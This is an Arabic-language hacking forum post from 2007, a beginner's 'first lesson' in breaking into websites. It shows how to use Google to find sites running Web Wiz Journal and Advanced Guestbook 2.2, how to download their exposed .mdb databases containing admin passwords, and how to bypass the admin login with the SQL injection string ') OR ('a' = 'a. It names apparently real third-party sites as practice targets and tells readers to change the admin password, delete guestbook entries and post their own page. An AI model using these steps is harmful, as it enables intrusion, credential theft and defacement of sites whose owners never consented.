][§¤°^°¤§][][شبكه الــعــمــودي][§¤°^°¤§][][
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

][§¤°^°¤§][][شبكه الــعــمــودي][§¤°^°¤§][][

مـعــا نــلتـقي لـنـرتـقـي لـغـد واعــد ,,,,
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول

][§¤°^°¤§][][شبكه الــعــمــودي][§¤°^°¤§][][ :: الشبكه العنكبوتيه والحاسوب :: منتــــدى الهــكـــرز وكل ماييتعلق بها
 

 اول درس في اختراق الموقع >>>

اذهب الى الأسفل 
كاتب الموضوعرسالة
AL_AMOUDI
رئيس مجلس الاداره
رئيس مجلس الاداره
AL_AMOUDI


عدد الرسائل : 548
تاريخ التسجيل : 11/06/2007

اول درس في اختراق الموقع >>> Empty
مُساهمةموضوع: اول درس في اختراق الموقع >>>   اول درس في اختراق الموقع >>> I_icon_minitimeالإثنين أغسطس 13, 2007 4:56 am
اول درس في اختراق الموقع >>> ويتبع
بسم الله الرحمن الرحيم

الوم سنتكلم عن احدي طرق اختراق العشوائي

موضعنا اليوم سهل وسيتم شرحو بلتطبيق ان شاء الله

وموضعنا مهم جدا للمبتدئين قبل الدخول في الشروحات الطويلة والصعبة فقط لاخذ فكرة عامة عن بعض طرق الاختراق

نخش في الموضوع ومعانا ثغرتين في منتهي السهولة

الاولي ثغرة Web Wiz Journal

1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث Web Wiz Journal

2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال www.victim.com/Journal

3- ضيف على الموقع كلمة Journal.mdb بحيث يصبح هكذا

www.victim.com/Journal/Journal.mdb

4- راح يحمل معك قاعدة بيانات الموقع وفيها كل الباسوردات

الحين افتحها في برنامج مايكروسفت اكسس وادخل مجلد tblConfiguration وراح تلاقي اليوز والباس ادامك

الحين ادخل علي www.victim.com/Journal/admin.htm

مشان تدخل لوحة التحكم وتغير الصفحة الرئيسية للجريدة

مثال عملي للتطبيق http://users.domaindlx.com/leyva/journal/


الثغرة الثانية نفس عمل الاولي لكن في ال news

مثال للتطبيق

http://www.butterburandsage.com/news/

لتحميل قاعدة البياانت

http://www.butterburandsage.com/news.mdb

للدخول للوحة التحكم

http://www.butterburandsage.com/news/admin.htm


الثغرة الثالثة : Advanced Guestbook 2.2


أذهب الى محرك بحث جوجل www.google.com

او اى محرك اخر مثال www.yahoo.com

او محرك اخر مثال www.usa.com


وأكتب Advanced Guestbook 2.2

ستظهر لك الكثير من المواقع التي تحتوي على سجل زوار من هذا النوع .


ثانيا:-
===

2- أختر أحد المواقع مثل هذا السجل للزوار للتجربة :-


http://www.uvfr.org/guestbook/


http://www.zanaf.dyndns.biz/guestbook


3- أضف بعد كلمه guestbook هذه الكلمه Admin.php ليصبح أسم الموقع هكذا :-


http://www.zanaf.dyndns.biz/guestbook/admin.php


ثالثا:-
===

ستظهر لك صفحة تطلب من اسم المستخدم والباس وورد

الخاص بالادمن اللى هو صاحب الموقع

أكتب في خانه user name

هذه الكلمه admin

وفي خانه الباسوورد أكتب

') OR ('a' = 'a

وبعدها أضغط Submit


رابعا:-
===

ستنتقل الى صفحة بعنوان G U E S T B O O K A D M I N

ومن هنا ابدا التعديل والتغيير والحذف على الفور


وبعدها قم بتغيير الباسوورد الخاص بالادمن اولا ثم بعد ذللك


وأدخل على قائمة Easy Admin وامسح كل الرسائل في السجل وأكتب ما تريده .


واترك سجل واحد فقط واعمل لة اضافة وحط الاندكس حقك



اتمني انو يكون درس حلو وبسيط للمبتدئين



اطيب تحيه لكم من اخوكم مجنون ليال
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://4m4s.yoo7.com
 
اول درس في اختراق الموقع >>>
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» اختراق المواقع...... لاتقعد تناظر تبي تخترق ادخل ...لوووووول
» طريقة البحث عن تعريفات توشيبا من الموقع الاصلي..............

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
][§¤°^°¤§][][شبكه الــعــمــودي][§¤°^°¤§][][ :: الشبكه العنكبوتيه والحاسوب :: منتــــدى الهــكـــرز وكل ماييتعلق بها-
انتقل الى: